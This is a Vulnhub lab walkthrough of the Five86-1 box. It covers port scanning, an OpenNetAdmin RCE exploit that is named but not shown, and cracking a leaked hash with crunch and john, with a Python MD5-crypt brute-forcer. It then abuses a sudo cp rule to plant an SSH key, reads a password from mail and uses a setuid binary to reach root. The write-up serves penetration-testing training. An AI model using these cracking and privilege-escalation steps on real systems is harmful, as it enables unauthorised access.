
【Vulnhub】Five86-1

five86-1

Description

The ultimate goal of this challenge is to get root and to read the one and only flag.

Information gathering

nmap -sP 192.168.1.0/24

  Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 15:02 CST
  Nmap scan report for 192.168.1.1
  Host is up (0.0021s latency).
  MAC Address: C4:F0:EC:7F:52:EC (Fiberhome Telecommunication Technologies)
  Nmap scan report for 192.168.1.2
  Host is up (0.091s latency).
  MAC Address: 20:34:FB:CF:B4:38 (Xiaomi Communications)
  Nmap scan report for 192.168.1.4
  Host is up (0.074s latency).
  MAC Address: 74:23:44:8D:74:79 (Xiaomi Communications)
  Nmap scan report for 192.168.1.7
  Host is up (0.00032s latency).
  MAC Address: B0:35:9F:56:8C:A9 (Intel Corporate)
  Nmap scan report for 192.168.1.8
  Host is up (0.38s latency).
  MAC Address: 34:CE:00:A5:BC:2D (Xiaomi Electronics,co.)
  Nmap scan report for 192.168.1.14
  Host is up.
  Nmap done: 256 IP addresses (6 hosts up) scanned in 132.91 seconds

Six hosts answer; the target is 192.168.1.7. (-sP is the legacy spelling of -sn: host discovery only, no port scan.)

Scan the target for open ports

nmap -sS -p1-65535 192.168.1.7

  Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 15:03 CST
  Nmap scan report for 192.168.1.7
  Host is up (0.00054s latency).
  Not shown: 65532 closed ports
  PORT STATE SERVICE
  22/tcp open ssh
  80/tcp open http
  10000/tcp open snet-sensor-mgmt
  MAC Address: B0:35:9F:56:8C:A9 (Intel Corporate)
  Nmap done: 1 IP address (1 host up) scanned in 2.51 seconds

Three ports are open. Start with the web service on port 80. (A SYN scan with -sS needs root. The SERVICE column is nmap's port-table guess, not the result of probing; a -sV scan would identify what actually listens on 10000.)

URL: http://192.168.1.7

The page is blank. Requesting robots.txt reveals a /ona entry.

Finding a vulnerability

/ona is an OpenNetAdmin v18.1.1 install. First check exploit-db for known vulnerabilities and exploits affecting that version.

Getting a shell

Download the second exploit and try it.

It works. Hmm, getting a shell this time was really quick; that is the power of an RCE vulnerability...

Privilege escalation

List the files owned by the www-data user. (find -user matches ownership, not readability. Almost every hit below is a /proc entry for www-data's own processes, i.e. the web server and our shell; excluding /proc with a -not -path filter and discarding stderr leaves only the two real files at the top of the list.)

find / -type f -user www-data

  /var/www/html/reports/.htaccess
  /var/log/ona.log
  /proc/1454/task/1454/fdinfo/0
  /proc/1454/task/1454/fdinfo/1
  /proc/1454/task/1454/fdinfo/2
  /proc/1454/task/1454/fdinfo/12
  /proc/1454/task/1454/environ
  /proc/1454/task/1454/auxv
  /proc/1454/task/1454/status
  /proc/1454/task/1454/personality
  /proc/1454/task/1454/limits
  /proc/1454/task/1454/sched
  /proc/1454/task/1454/comm
  /proc/1454/task/1454/syscall
  /proc/1454/task/1454/cmdline
  /proc/1454/task/1454/stat
  /proc/1454/task/1454/statm
  /proc/1454/task/1454/maps
  /proc/1454/task/1454/children
  /proc/1454/task/1454/numa_maps
  /proc/1454/task/1454/mem
  /proc/1454/task/1454/mounts
  /proc/1454/task/1454/mountinfo
  /proc/1454/task/1454/clear_refs
  /proc/1454/task/1454/smaps
  /proc/1454/task/1454/smaps_rollup
  /proc/1454/task/1454/pagemap
  /proc/1454/task/1454/attr/current
  /proc/1454/task/1454/attr/prev
  /proc/1454/task/1454/attr/exec
  /proc/1454/task/1454/attr/fscreate
  /proc/1454/task/1454/attr/keycreate
  /proc/1454/task/1454/attr/sockcreate
  /proc/1454/task/1454/wchan
  /proc/1454/task/1454/stack
  /proc/1454/task/1454/schedstat
  /proc/1454/task/1454/cpuset
  /proc/1454/task/1454/cgroup
  /proc/1454/task/1454/oom_score
  /proc/1454/task/1454/oom_adj
  /proc/1454/task/1454/oom_score_adj
  /proc/1454/task/1454/loginuid
  /proc/1454/task/1454/sessionid
  /proc/1454/task/1454/io
  /proc/1454/task/1454/uid_map
  /proc/1454/task/1454/gid_map
  /proc/1454/task/1454/projid_map
  /proc/1454/task/1454/setgroups
  /proc/1454/task/1454/patch_state
  /proc/1454/fdinfo/0
  /proc/1454/fdinfo/1
  /proc/1454/fdinfo/2
  /proc/1454/fdinfo/12
  /proc/1454/environ
  /proc/1454/auxv
  /proc/1454/status
  /proc/1454/personality
  /proc/1454/limits
  /proc/1454/sched
  /proc/1454/autogroup
  /proc/1454/comm
  /proc/1454/syscall
  /proc/1454/cmdline
  /proc/1454/stat
  /proc/1454/statm
  /proc/1454/maps
  /proc/1454/numa_maps
  /proc/1454/mem
  /proc/1454/mounts
  /proc/1454/mountinfo
  /proc/1454/mountstats
  /proc/1454/clear_refs
  /proc/1454/smaps
  /proc/1454/smaps_rollup
  /proc/1454/pagemap
  /proc/1454/attr/current
  /proc/1454/attr/prev
  /proc/1454/attr/exec
  /proc/1454/attr/fscreate
  /proc/1454/attr/keycreate
  /proc/1454/attr/sockcreate
  /proc/1454/wchan
  /proc/1454/stack
  /proc/1454/schedstat
  /proc/1454/cpuset
  /proc/1454/cgroup
  /proc/1454/oom_score
  /proc/1454/oom_adj
  /proc/1454/oom_score_adj
  /proc/1454/loginuid
  /proc/1454/sessionid
  /proc/1454/coredump_filter
  /proc/1454/io
  /proc/1454/uid_map
  /proc/1454/gid_map
  /proc/1454/projid_map
  /proc/1454/setgroups
  /proc/1454/timers
  /proc/1454/timerslack_ns
  /proc/1454/patch_state
  /proc/1456/task/1456/fdinfo/0
  /proc/1456/task/1456/fdinfo/1
  /proc/1456/task/1456/fdinfo/2
  /proc/1456/task/1456/fdinfo/3
  /proc/1456/task/1456/fdinfo/4
  /proc/1456/task/1456/fdinfo/5
  /proc/1456/task/1456/fdinfo/7
  /proc/1456/task/1456/fdinfo/8
  /proc/1456/task/1456/fdinfo/9
  /proc/1456/task/1456/fdinfo/10
  /proc/1456/task/1456/fdinfo/12
  /proc/1456/task/1456/environ
  /proc/1456/task/1456/auxv
  /proc/1456/task/1456/status
  /proc/1456/task/1456/personality
  /proc/1456/task/1456/limits
  /proc/1456/task/1456/sched
  /proc/1456/task/1456/comm
  /proc/1456/task/1456/syscall
  /proc/1456/task/1456/cmdline
  /proc/1456/task/1456/stat
  /proc/1456/task/1456/statm
  /proc/1456/task/1456/maps
  /proc/1456/task/1456/children
  /proc/1456/task/1456/numa_maps
  /proc/1456/task/1456/mem
  /proc/1456/task/1456/mounts
  /proc/1456/task/1456/mountinfo
  /proc/1456/task/1456/clear_refs
  /proc/1456/task/1456/smaps
  /proc/1456/task/1456/smaps_rollup
  /proc/1456/task/1456/pagemap
  /proc/1456/task/1456/attr/current
  /proc/1456/task/1456/attr/prev
  /proc/1456/task/1456/attr/exec
  /proc/1456/task/1456/attr/fscreate
  /proc/1456/task/1456/attr/keycreate
  /proc/1456/task/1456/attr/sockcreate
  /proc/1456/task/1456/wchan
  /proc/1456/task/1456/stack
  /proc/1456/task/1456/schedstat
  /proc/1456/task/1456/cpuset
  /proc/1456/task/1456/cgroup
  /proc/1456/task/1456/oom_score
  /proc/1456/task/1456/oom_adj
  /proc/1456/task/1456/oom_score_adj
  /proc/1456/task/1456/loginuid
  /proc/1456/task/1456/sessionid
  /proc/1456/task/1456/io
  /proc/1456/task/1456/uid_map
  /proc/1456/task/1456/gid_map
  /proc/1456/task/1456/projid_map
  /proc/1456/task/1456/setgroups
  /proc/1456/task/1456/patch_state
  /proc/1456/fdinfo/0
  /proc/1456/fdinfo/1
  /proc/1456/fdinfo/2
  /proc/1456/fdinfo/3
  /proc/1456/fdinfo/4
  /proc/1456/fdinfo/6
  /proc/1456/fdinfo/7
  /proc/1456/fdinfo/12
  /proc/1456/environ
  /proc/1456/auxv
  /proc/1456/status
  /proc/1456/personality
  /proc/1456/limits
  /proc/1456/sched
  /proc/1456/autogroup
  /proc/1456/comm
  /proc/1456/syscall
  /proc/1456/cmdline
  /proc/1456/stat
  /proc/1456/statm
  /proc/1456/maps
  /proc/1456/numa_maps
  /proc/1456/mem
  /proc/1456/mounts
  /proc/1456/mountinfo
  /proc/1456/mountstats
  /proc/1456/clear_refs
  /proc/1456/smaps
  /proc/1456/smaps_rollup
  /proc/1456/pagemap
  /proc/1456/attr/current
  /proc/1456/attr/prev
  /proc/1456/attr/exec
  /proc/1456/attr/fscreate
  /proc/1456/attr/keycreate
  /proc/1456/attr/sockcreate
  /proc/1456/wchan
  /proc/1456/stack
  /proc/1456/schedstat
  /proc/1456/cpuset
  /proc/1456/cgroup
  /proc/1456/oom_score
  /proc/1456/oom_adj
  /proc/1456/oom_score_adj
  /proc/1456/loginuid
  /proc/1456/sessionid
  /proc/1456/coredump_filter
  /proc/1456/io
  /proc/1456/uid_map
  /proc/1456/gid_map
  /proc/1456/projid_map
  /proc/1456/setgroups
  /proc/1456/timers
  /proc/1456/timerslack_ns
  /proc/1456/patch_state

/var/www/html/reports/.htaccess is the interesting one; read it.

It contains a password hash for the user douglas, together with a hint giving the password length and the character set it is drawn from. That hint is what makes the hash crackable in reasonable time: it collapses the keyspace to a few tens of millions of candidates, which a wordlist attack exhausts quickly. John the Ripper can crack it; john is also the usual tool for Linux /etc/passwd + /etc/shadow pairs, which is where the unshadow step below comes from, although a hash taken from a web auth file can be fed to john directly as a `user:hash` line.

Generate the wordlist with crunch

crunch 10 10 aefhrt > pwd.txt   # usage: crunch <min> <max> <charset> > <outputfile>; here every string of exactly 10 characters over a,e,f,h,r,t (6^10 = 60,466,176 lines)

Use unshadow to build a file with the user entry and the password hash (unshadow merges a passwd-format file with a shadow-format file; for a single `user:hash` line john would accept the file as-is, so this step is optional).

dpasswd holds douglas's line taken from /etc/passwd.

Now crack the hash with john

john --wordlist=pwd.txt hashfile

john refuses to re-crack a hash it has already cracked (results are kept in its pot file), which is why it prints this message on a second run; john --show hashfile displays the previously cracked result.

So the credentials are douglas:fatherrrrr (ten characters, all from the hinted alphabet, as expected).
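To show what crunch and john are doing under the hood in the step above, here is an added example (not code from the original write-up or from any of the tools it uses). It assumes the hash is in the Apache htpasswd $apr1$ MD5-crypt format that a web-auth file normally carries; if john reports a different format, only the hashing routine changes. The md5crypt routine is a port of the classic crypt_md5 reference algorithm, and the demo hash, salt and 3-character password are constructed so the exhaustive search over the box's hint alphabet completes in pure Python; the real keyspace (6^10) is only computed, not searched.

```python
import hashlib
import itertools
from typing import Optional

# crypt(3)'s own base64 alphabet (not the RFC 4648 one)
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def md5crypt(password: bytes, salt: bytes, magic: bytes = b"$apr1$") -> str:
    """MD5-crypt: $apr1$ (Apache htpasswd) and $1$ (old /etc/shadow) differ only in the magic.

    Port of the crypt_md5() reference algorithm: 1000 MD5 rounds with a fixed
    schedule, then crypt's peculiar byte reordering before the custom base64.
    """
    salt = salt[:8]
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    # Mix in MD5(pw, salt, pw), as many bytes as the password has
    remaining = len(password)
    while remaining > 0:
        ctx.update(alt[: min(16, remaining)])
        remaining -= 16
    # One byte per bit of len(password): NUL for a 1 bit, pw[0] for a 0 bit
    bits = len(password)
    while bits:
        ctx.update(b"\0" if bits & 1 else password[:1])
        bits >>= 1
    final = ctx.digest()
    # Key stretching: 1000 rounds alternating password / previous digest, salt on 2 of 3
    for i in range(1000):
        rnd = hashlib.md5(password if i & 1 else final)
        if i % 3:
            rnd.update(salt)
        if i % 7:
            rnd.update(password)
        rnd.update(final if i & 1 else password)
        final = rnd.digest()
    # Encode the 16 digest bytes as 22 chars, 3 bytes at a time in crypt's fixed order
    out = []
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        v = (final[a] << 16) | (final[b] << 8) | final[c]
        for _ in range(4):
            out.append(ITOA64[v & 0x3F])
            v >>= 6
    v = final[11]
    for _ in range(2):
        out.append(ITOA64[v & 0x3F])
        v >>= 6
    return (magic + salt + b"$").decode() + "".join(out)


def verify(password: str, stored: str) -> bool:
    """Check one candidate against a stored "$apr1$<salt>$<hash>" or "$1$<salt>$<hash>"."""
    _, kind, salt, _ = stored.split("$")
    return md5crypt(password.encode(), salt.encode(), f"${kind}$".encode()) == stored


def keyspace(charset: str, length: int) -> int:
    """Number of candidates `crunch length length charset` would emit."""
    return len(charset) ** length


def crack(stored: str, charset: str, length: int) -> Optional[str]:
    """Same work as `crunch L L charset > pwd.txt; john --wordlist=pwd.txt`: try every
    string of exactly `length` characters over `charset` until one verifies."""
    for combo in itertools.product(charset, repeat=length):
        candidate = "".join(combo)
        if verify(candidate, stored):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed demo hash (not the one from the box): a 3-character password over the
    # box's hint alphabet, so the exhaustive search is 216 candidates instead of 6^10.
    demo = md5crypt(b"fat", b"five86ab")
    print(demo)
    print("cracked:", crack(demo, "aefhrt", 3))
    print("box keyspace 6^10 =", keyspace("aefhrt", 10))
```

The point of the hint in the .htaccess file is visible in keyspace(): 6^10 is about 60 million candidates, which john works through in minutes even on a laptop, whereas a 10-character password over the full printable alphabet would be out of reach for this kind of attack.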

Then more enumeration. sudo -l turns up something useful:

douglas may run /bin/cp as the user jen via sudo, and no password is required for it.

From this it is fairly clear that the road to root goes through jen first. So we use the cp command to drop our SSH public key into jen's home directory as jen's authorized key.

A short note on why these steps are done under /tmp.

The box author locked permissions down tightly: a non-root user cannot touch other users' home directories (which is how it should be). Looking around, /tmp was the only place I found that was writable.

douglas's own home directory is writable as well, of course, but a file placed there cannot be copied into /home/jen with sudo -u jen cp. That command runs as jen, and jen has no permission to read anything under douglas's home directory.
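The permission rule behind the paragraph above, as an added example that is not part of the original write-up: a Unix DAC check needs search (x) permission on every directory along the path plus the requested bit on the final entry, and picks exactly one class (owner, else group, else other). The miniature filesystem, the uids and the file name key.pub are constructed to mirror the situation the text describes; they are assumptions, not values taken from the box.

```python
from typing import Dict, Set, Tuple

Entry = Tuple[int, int, int]  # (owner uid, group gid, mode bits incl. sticky/setuid)

# Constructed model of the relevant paths (assumed uids; homes locked to their owner).
ROOT, DOUGLAS, JEN = 0, 1001, 1002
FS: Dict[str, Entry] = {
    "/": (ROOT, ROOT, 0o755),
    "/home": (ROOT, ROOT, 0o755),
    "/home/douglas": (DOUGLAS, DOUGLAS, 0o700),      # only douglas can enter
    "/home/douglas/key.pub": (DOUGLAS, DOUGLAS, 0o644),
    "/home/jen": (JEN, JEN, 0o700),
    "/home/jen/.ssh": (JEN, JEN, 0o700),
    "/tmp": (ROOT, ROOT, 0o1777),                    # world-writable, sticky bit
    "/tmp/key.pub": (DOUGLAS, DOUGLAS, 0o644),       # staged copy, umask 022
}


def _class_bits(entry: Entry, uid: int, gids: Set[int]) -> int:
    """Select the one permission class that applies: owner, else group, else other."""
    owner, group, mode = entry
    if uid == owner:
        return (mode >> 6) & 7
    if group in gids:
        return (mode >> 3) & 7
    return mode & 7


def can_access(fs: Dict[str, Entry], path: str, uid: int, gids: Set[int], want: str) -> bool:
    """DAC check: x on every directory component, then `want` ("r", "w" or "x") on the leaf."""
    if uid == 0:
        return True  # root carries CAP_DAC_OVERRIDE and skips the mode-bit checks
    parts = [p for p in path.split("/") if p]
    parents = ["/"] + ["/" + "/".join(parts[:i]) for i in range(1, len(parts))]
    for d in parents:
        if not _class_bits(fs[d], uid, gids) & 1:
            return False  # no search permission: nothing below is reachable
    need = {"r": 4, "w": 2, "x": 1}[want]
    return bool(_class_bits(fs[path], uid, gids) & need)


def sudo_cp_as(fs: Dict[str, Entry], runas: int, src: str, dst_dir: str) -> bool:
    """`sudo -u <runas> /bin/cp src dst_dir/...` runs cp entirely as <runas>, so <runas>
    must be able to read src and to create an entry in dst_dir (w and x on that directory)."""
    return (
        can_access(fs, src, runas, {runas}, "r")
        and can_access(fs, dst_dir, runas, {runas}, "w")
        and can_access(fs, dst_dir, runas, {runas}, "x")
    )


if __name__ == "__main__":
    print("key in douglas's home:", sudo_cp_as(FS, JEN, "/home/douglas/key.pub", "/home/jen/.ssh"))
    print("key staged in /tmp:   ", sudo_cp_as(FS, JEN, "/tmp/key.pub", "/home/jen/.ssh"))
```

Two practical consequences follow from the same rule: the staged file in /tmp must itself be readable by jen (a 644 file is; one created with a restrictive umask is not), and the sticky bit on /tmp only stops other users from deleting or renaming the file, it does not stop them from reading it, so the public key is the right thing to stage there and the private key is not.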

With the public key in place, log in as jen over ssh.

As before, I first check which files jen owns.

find / -type f -user jen 2>/dev/null

This turns up jen's mailbox (the login banner actually announced it in its last line, "You have new mail", but I had not noticed).

Read the mail

It contains the password of the user moss: Fire!Fire!

Switch to moss

su moss

moss's home has a hidden directory, .games, full of games. Looking through them, upyourgame stands out from the rest.

Run upyourgame, type anything at its prompts, and you get a root shell. (Worth checking with ls -l whether the binary is owned by root with the setuid bit set, since that is what a privilege jump like this normally relies on.)

For convenient access later, I would add an SSH public key for the root user as well.

By the way, the service on port 10000 is Webmin; hmm, it was not needed in the end.

Source page: https://www.wpsshop.cn/w/IT小白/article/detail/836374